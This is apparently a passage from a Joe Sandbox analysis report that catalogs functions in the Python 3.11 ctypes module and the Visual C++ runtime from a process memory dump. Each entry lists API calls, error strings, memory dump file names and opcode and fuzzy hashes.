not a ctypes type or object, xrefs: 00007FF8B93CD852
siN, xrefs: 00007FF8B93CD8DB

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$BuildDeallocFromLong_OccurredSsize_tStringTuple_Value
String ID: not a ctypes type or object$siN
API String ID: 1444022424-92050270
Opcode ID: 26a9fcd1b49395e45c52150cf6bc8a8343daf74cdcd0b31558393dc906a49e26
Instruction ID: a1935fa7c0430ab581b798b3bba33b96582d52a6683a010c7b53c3d14b5bbdd5
Opcode Fuzzy Hash: 26a9fcd1b49395e45c52150cf6bc8a8343daf74cdcd0b31558393dc906a49e26
Instruction Fuzzy Hash: 36212921A09FC681EA649F2AE59027A23B5EF4DFD4F086034EF1E57764DF2CE8498310

Function 00007FF8B93C9FEC Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CA00E
PyObject_GetBuffer.PYTHON311 ref: 00007FF8B93CA024
PyErr_SetString.PYTHON311 ref: 00007FF8B93CA04A
PyBuffer_Release.PYTHON311 ref: 00007FF8B93CA055
memcpy.VCRUNTIME140 ref: 00007FF8B93CA066
PyBuffer_Release.PYTHON311 ref: 00007FF8B93CA070

Strings

byte string too long, xrefs: 00007FF8B93CA040
cannot delete attribute, xrefs: 00007FF8B93CA004

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
String ID: byte string too long$cannot delete attribute
API String ID: 1128862751-688604938
Opcode ID: c0fad4b2d32ac0ab3663af02738014edb070c5b9f2759e00e789a8b2334ff090
Instruction ID: 5be89f63646afb9f5f581761974c6eaf6a5281bc630cded9249a8e462edd0ff6
Opcode Fuzzy Hash: c0fad4b2d32ac0ab3663af02738014edb070c5b9f2759e00e789a8b2334ff090
Instruction Fuzzy Hash: D5013C61A18E8682EA20CF69E46447A2374FF8DFC8F506132CB5E87264DE2DE548C700

Function 00007FF8B93C5950 Relevance: 13.7, APIs: 9, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B93C5978
__scrt_initialize_crt.LIBCMT ref: 00007FF8B93C59BD
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B93C59CA
_RTC_Initialize.LIBCMT ref: 00007FF8B93C59F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B93C5A1E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B93C5A49

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 31b097c5beb5f15cde6c2b56eb33e70b4a1a94a0495c7f4a48947f332bb9daf1
Instruction ID: c0931f6510a4b1d73d5d31398a5cb1ab3a12db3357dc41ba87ea5bba15816ac5
Opcode Fuzzy Hash: 31b097c5beb5f15cde6c2b56eb33e70b4a1a94a0495c7f4a48947f332bb9daf1
Instruction Fuzzy Hash: D381A025E0CBC786F760AF6E94512BA66B4AF8D7C4F54A035DB0D87396DE3CE4498700

Function 00007FF8B93C2FC0 Relevance: 13.7, APIs: 9, Instructions: 155COMMON

Download Yara Rule

APIs

PyTuple_GetItem.PYTHON311 ref: 00007FF8B93C2FE9
_PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C3049
_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93C30E6
PyDict_Update.PYTHON311 ref: 00007FF8B93C3181
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C31A4
_Py_CheckFunctionResult.PYTHON311 ref: 00007FF8B93C7D06

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dict_Item$CallCheckDeallocErrorFunctionMakeObject_ResultTuple_UpdateWith
String ID:
API String ID: 1807771726-0
Opcode ID: 42a6a9498eb4336f8fb7f7e14a875b7f35efea189098be1472c8111e8b538fde
Instruction ID: 2f329af1e4c891a773beedaad7af04fbef6140d9aa64eebd88d0012e3f80c479
Opcode Fuzzy Hash: 42a6a9498eb4336f8fb7f7e14a875b7f35efea189098be1472c8111e8b538fde
Instruction Fuzzy Hash: D6611E21A0DF8686EAA59F29A95437A23B4AF4DFD4F086035DF4E077A5DF3CE4598300

Function 00007FF8B9F661AA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B9F66690: RtlPcToFileHeader.KERNEL32 ref: 00007FF8B9F666D4
Part of subcall function 00007FF8B9F66690: RaiseException.KERNEL32 ref: 00007FF8B9F6671A

RtlPcToFileHeader.KERNEL32 ref: 00007FF8B9F66247
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FF8B9F662A3

Strings

Access violation - no RTTI data!, xrefs: 00007FF8B9F661AA, 00007FF8B9F663CB
Attempted a typeid of nullptr pointer!, xrefs: 00007FF8B9F66385
Bad read pointer - no RTTI data!, xrefs: 00007FF8B9F663A8
Bad dynamic_cast!, xrefs: 00007FF8B9F66312

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
Instruction ID: 05883240b84d4d1fc3f4153285b76bc4d5550c7f6d8c5c0b5b3d06716ebf4d26
Opcode Fuzzy Hash: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
Instruction Fuzzy Hash: BA518D62A18BC692EF20CF98E8911B96360FB46BEAF409135DB4E47765DF3CE505C300

Function 00007FF8B9F66B5C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF8B9F66D1B,?,?,00000000,00007FF8B9F66B4C,?,?,?,?,00007FF8B9F66885), ref: 00007FF8B9F66BE1
GetLastError.KERNEL32(?,?,?,00007FF8B9F66D1B,?,?,00000000,00007FF8B9F66B4C,?,?,?,?,00007FF8B9F66885), ref: 00007FF8B9F66BEF
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B9F66D1B,?,?,00000000,00007FF8B9F66B4C,?,?,?,?,00007FF8B9F66885), ref: 00007FF8B9F66C08
LoadLibraryExW.KERNEL32(?,?,?,00007FF8B9F66D1B,?,?,00000000,00007FF8B9F66B4C,?,?,?,?,00007FF8B9F66885), ref: 00007FF8B9F66C1A
FreeLibrary.KERNEL32(?,?,?,00007FF8B9F66D1B,?,?,00000000,00007FF8B9F66B4C,?,?,?,?,00007FF8B9F66885), ref: 00007FF8B9F66C60
GetProcAddress.KERNEL32(?,?,?,00007FF8B9F66D1B,?,?,00000000,00007FF8B9F66B4C,?,?,?,?,00007FF8B9F66885), ref: 00007FF8B9F66C6C

Strings

api-ms-, xrefs: 00007FF8B9F66C01

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
Instruction ID: c161ef8b83133fb42bc23633f3005715f79605d11710c2b726e1e3afbac552b8
Opcode Fuzzy Hash: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
Instruction Fuzzy Hash: 0D31BE21B1AFC291EE219F4AE8005B426A8FF4ABF6F595535DE1D0A394DF3DE148C300

Function 00007FF8B93C21A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

PyMem_Malloc.PYTHON311 ref: 00007FF8B93C21E5
PyDict_Update.PYTHON311 ref: 00007FF8B93C224F
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C2272
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93C7222
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7256

Strings

X{}, xrefs: 00007FF8B93C220A

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$CallDict_Err_MakeMallocMem_MemoryObject_Update
String ID: X{}
API String ID: 3445980372-2140212134
Opcode ID: 3f2902342c13d165ca5a04ad6b751020229967bc3c101f7663baa985dba562bd
Instruction ID: 16f6b4d2138440e187f20566b32fb117848ab27073f58f2021ebafc9e6716469
Opcode Fuzzy Hash: 3f2902342c13d165ca5a04ad6b751020229967bc3c101f7663baa985dba562bd
Instruction Fuzzy Hash: 0C311A31A09F8685EA958F6DA95427A62B4EF4AFD0F58A134DB5E077A0DF3CE4588300

Function 00007FF8B93C1860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C18A7
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C18F5
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6AF1
PyCallable_Check.PYTHON311 ref: 00007FF8B93C6B12
PyErr_SetString.PYTHON311 ref: 00007FF8B93C6B31
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6B4A

Strings

restype must be a type, a callable, or None, xrefs: 00007FF8B93C6B27

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$AttrCallable_CheckErr_LookupObject_String
String ID: restype must be a type, a callable, or None
API String ID: 1528254987-4008198047
Opcode ID: 6452f5985481fdf810af319e620606f51f1d816ac9bc74436ba4aa13f9c82220
Instruction ID: c0b864d212cadea3c76ca8beb368014dc78bf7da97395f8dc4601eb37a1b6895
Opcode Fuzzy Hash: 6452f5985481fdf810af319e620606f51f1d816ac9bc74436ba4aa13f9c82220
Instruction Fuzzy Hash: AC312122E0DF8781FA659F6ED55037A23B4EF49BD4F18A130CB4D566A4DF2CE8499300

Function 00007FF8B93CB5AC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CB5DE
PyErr_Format.PYTHON311 ref: 00007FF8B93CB622
PyUnicode_AsWideChar.PYTHON311 ref: 00007FF8B93CB639
PyUnicode_AsWideChar.PYTHON311 ref: 00007FF8B93CB669

Strings

string too long, xrefs: 00007FF8B93CB653
unicode string expected instead of %s instance, xrefs: 00007FF8B93CB614
can't delete attribute, xrefs: 00007FF8B93CB5D4

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: CharErr_Unicode_Wide$FormatString
String ID: can't delete attribute$string too long$unicode string expected instead of %s instance
API String ID: 530648689-1577475929
Opcode ID: 54871f426e13d62f20164b13e72e16cb3eb4130456bf9d3dcc44f832ca140448
Instruction ID: c7ef8ef05729fa22ac217ca44c22fc8bd324394220fa33eddd3ca7247aad4abf
Opcode Fuzzy Hash: 54871f426e13d62f20164b13e72e16cb3eb4130456bf9d3dcc44f832ca140448
Instruction Fuzzy Hash: A5213861A08BC682EB64CF6AE4901796375FF89FD0F54A136EB1D07668CF2CE499C700

Function 00007FF8B93CEBE4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

PyLong_AsUnsignedLongLongMask.PYTHON311 ref: 00007FF8B93CEC1D

Strings

_ctypes/cfield.c pymem, xrefs: 00007FF8B93CEC77
unicode string or integer address expected instead of %s instance, xrefs: 00007FF8B93CEC3F

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Long$Long_MaskUnsigned
String ID: _ctypes/cfield.c pymem$unicode string or integer address expected instead of %s instance
API String ID: 1805849926-901310697
Opcode ID: 2ce16603c6b5fb28991612c657e35fb793e2d5932663eadf79fd1512b973919a
Instruction ID: 3b0c39eef8f870fdd2569663287984b1279fc0e2b5c550af98268dac63c9ad9e
Opcode Fuzzy Hash: 2ce16603c6b5fb28991612c657e35fb793e2d5932663eadf79fd1512b973919a
Instruction Fuzzy Hash: 79110A75A0AFC681EA648F5DE8642792775EF4DFC5F54A036CB1E06754EE3CE8A88300

Function 00007FF8B93CF574 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON311 ref: 00007FF8B93CF5AA
PyUnicode_AsWideChar.PYTHON311 ref: 00007FF8B93CF5C5
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CF5DA
PyErr_SetString.PYTHON311 ref: 00007FF8B93CF5F1
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CF60A

Strings

unicode string expected instead of %s instance, xrefs: 00007FF8B93CF59C
one character unicode string expected, xrefs: 00007FF8B93CF5E7

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_$CharFormatStringUnicode_Wide
String ID: one character unicode string expected$unicode string expected instead of %s instance
API String ID: 3624372013-2255738861
Opcode ID: a442bb40f20c3a4dd4081ba5bcb0ae0298b6afa5f68cd383e2f326c911a818c9
Instruction ID: 7b49cbfee2cc6e60151e121a1bcb51945cbb1eff948e9ef6469fc764f8822c59
Opcode Fuzzy Hash: a442bb40f20c3a4dd4081ba5bcb0ae0298b6afa5f68cd383e2f326c911a818c9
Instruction Fuzzy Hash: B411FB76A09B8681EBA48F29E8541792374EF8EFD4F54B132DB4E47724DE2DE498C300

Function 00007FF8B93CDC30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CDC4F
GetLastError.KERNEL32 ref: 00007FF8B93CDC65
PyUnicode_FromWideChar.PYTHON311 ref: 00007FF8B93CDC8E
LocalFree.KERNEL32 ref: 00007FF8B93CDC9A

Strings

<no description>, xrefs: 00007FF8B93CDCA2
|i:FormatError, xrefs: 00007FF8B93CDC44

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_CharErrorFreeFromLastLocalParseTupleUnicode_Wide
String ID: <no description>$|i:FormatError
API String ID: 935104296-1632374824
Opcode ID: da62cbb651d4d48137c88a006a0480f238e20f846b976fc73609049c0e997912
Instruction ID: 30e09a670f3802717d65e0dfed55f9ff923a8e193d80a6c028c4d7ef6aac5394
Opcode Fuzzy Hash: da62cbb651d4d48137c88a006a0480f238e20f846b976fc73609049c0e997912
Instruction Fuzzy Hash: AF016965A08BC652EA645F19A85407A62B5FF4DBD1F146230DB7E432D4EE3CE4488710

Function 00007FF8B93CDCC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CDCE5
PyEval_SaveThread.PYTHON311 ref: 00007FF8B93CDCF3
FreeLibrary.KERNEL32 ref: 00007FF8B93CDD01
PyEval_RestoreThread.PYTHON311 ref: 00007FF8B93CDD1C
PyErr_SetFromWindowsErr.PYTHON311 ref: 00007FF8B93CDD28

Strings

O&:FreeLibrary, xrefs: 00007FF8B93CDCD7

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Eval_Thread$Arg_Err_FreeFromLibraryParseRestoreSaveTupleWindows
String ID: O&:FreeLibrary
API String ID: 204461231-2600264430
Opcode ID: 078f241c74f91baaec2f50080a5493ab98081374dae74a9cab3a0cffd8d54dea
Instruction ID: 61e0dd87f22e6c5f3dca55c28d526a478b15851e58ad40dfb772c3ef41e50572
Opcode Fuzzy Hash: 078f241c74f91baaec2f50080a5493ab98081374dae74a9cab3a0cffd8d54dea
Instruction Fuzzy Hash: DA011B21A0CF8782E7A18F69A85413A2374EF8DBC4F146431EB5E43614DE3CE4498750

Function 00007FF8B93CA9E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CAA18
PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93CAA2C
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FF8B93CAA46
_Py_BuildValue_SizeT.PYTHON311 ref: 00007FF8B93CAA65

Strings

__dict__, xrefs: 00007FF8B93CAA22
O(O(NN)), xrefs: 00007FF8B93CAA53
ctypes objects containing pointers cannot be pickled, xrefs: 00007FF8B93CAA0E

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: String$Size$AttrBuildBytes_Err_FromObject_Value_
String ID: O(O(NN))$__dict__$ctypes objects containing pointers cannot be pickled
API String ID: 1770468409-724424928
Opcode ID: 3ee03d1d2b345c529b1bd3c85f0488fda98b0b8f69e1e8ea5ec09f1cc578dd04
Instruction ID: 22a1d2f950320c5098abefe07835714fc318fc8472876cb72b875c56df9d3fe5
Opcode Fuzzy Hash: 3ee03d1d2b345c529b1bd3c85f0488fda98b0b8f69e1e8ea5ec09f1cc578dd04
Instruction Fuzzy Hash: EE011B25A08B8692EA608F1AE95017A2374FF4DFD4F446131DF8D53764DF2CE555C700

Function 00007FF8B9F629FC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F62AB6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F62AD5
__AdjustPointer.LIBCMT ref: 00007FF8B9F62B16
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F62B23
__AdjustPointer.LIBCMT ref: 00007FF8B9F62B5F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F62B74
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F62BB9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F62BC0

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
Instruction ID: 316b76bd91c53515e7b014bb852256becaa33e98a0e0d76b9c5513570159dfcb
Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
Instruction Fuzzy Hash: 4E51AB21A0ABC281EA658F19D4446BC67A4EF85FF3F09A539CB4D8A794DF7CE442C300

Function 00007FF8B9F62818 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F628D0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F628EE
__AdjustPointer.LIBCMT ref: 00007FF8B9F6292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F6293C
__AdjustPointer.LIBCMT ref: 00007FF8B9F62978
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F6298D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F629D2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F629D9

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

